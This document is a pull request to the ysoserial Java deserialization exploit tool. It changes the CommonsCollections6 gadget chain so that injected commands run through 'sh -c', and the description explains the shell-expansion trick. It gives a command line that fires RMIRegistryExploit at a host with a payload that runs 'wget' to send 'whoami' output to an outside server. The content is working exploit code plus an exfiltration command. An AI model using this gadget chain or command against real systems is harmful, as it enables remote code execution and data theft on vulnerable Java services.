### PR TITLE
change Runtime exec(String) to exec(String[])

### DIFF
--- a/src/main/java/ysoserial/payloads/CommonsCollections6.java
+++ b/src/main/java/ysoserial/payloads/CommonsCollections6.java
@@ -37,7 +37,7 @@ public class CommonsCollections6 extends PayloadRunner implements ObjectPayload<
 
     public Serializable getObject(final String command) throws Exception {
 
-        final String[] execArgs = new String[] { command };
+        final String[] execArgs = new String[] { "sh", "-c", command };
 
         final Transformer[] transformers = new Transformer[] {
                 new ConstantTransformer(Runtime.class),
@@ -47,8 +47,9 @@ public class CommonsCollections6 extends PayloadRunner implements ObjectPayload<
                 new InvokerTransformer("invoke", new Class[] {
                         Object.class, Object[].class }, new Object[] {
                         null, new Object[0] }),
-                new InvokerTransformer("exec",
-                        new Class[] { String.class }, execArgs),
+                new InvokerTransformer("exec", new Class[] {
+                        String[].class }, new Object[] {
+                        execArgs }),
                 new ConstantTransformer(1) };
 
         Transformer transformerChain = new ChainedTransformer(transformers);


### PR DESCRIPTION
Java Runtime.getRuntime().exec(String cmd) is not a shell environment. It could not use cmd like "echo $(whoami)" which $(whoami) would be executed. 
`Runtime.getRuntime().exec("echo $(whoami)");`
will print out : $(whoami)
but not : root

But we could make the `String cmd` in a shell environment like this
`String[] cmd_arr = {"sh", "-c", "echo $(whoami)"};`
`Runtime.getRuntime().exec(String[] cmd_arr);`
will print out : root

Or we could make StringTokenizer work appropriately that Runtime.getRuntime().exec use it to parse `String cmd`. A little ugly cmd like this
`Runtime.getRuntime().exec("bash -c echo${IFS}$(whoami)");`
will print out: root

So I change execArgs and exec parameters to make `String command`  into a shell environment. After doing this, user could use 
`java -cp ysoserial-0.0.4-all.jar ysoserial.exploit.RMIRegistryExploit myhost 1099 CommonsCollections6 'wget selfhost.com/?$(whoami)'`
instead of 
`java -cp ysoserial-0.0.4-all.jar ysoserial.exploit.RMIRegistryExploit myhost 1099 CommonsCollections6 'bash -c wget${IFS}selfhost.com/?$(whoami)'`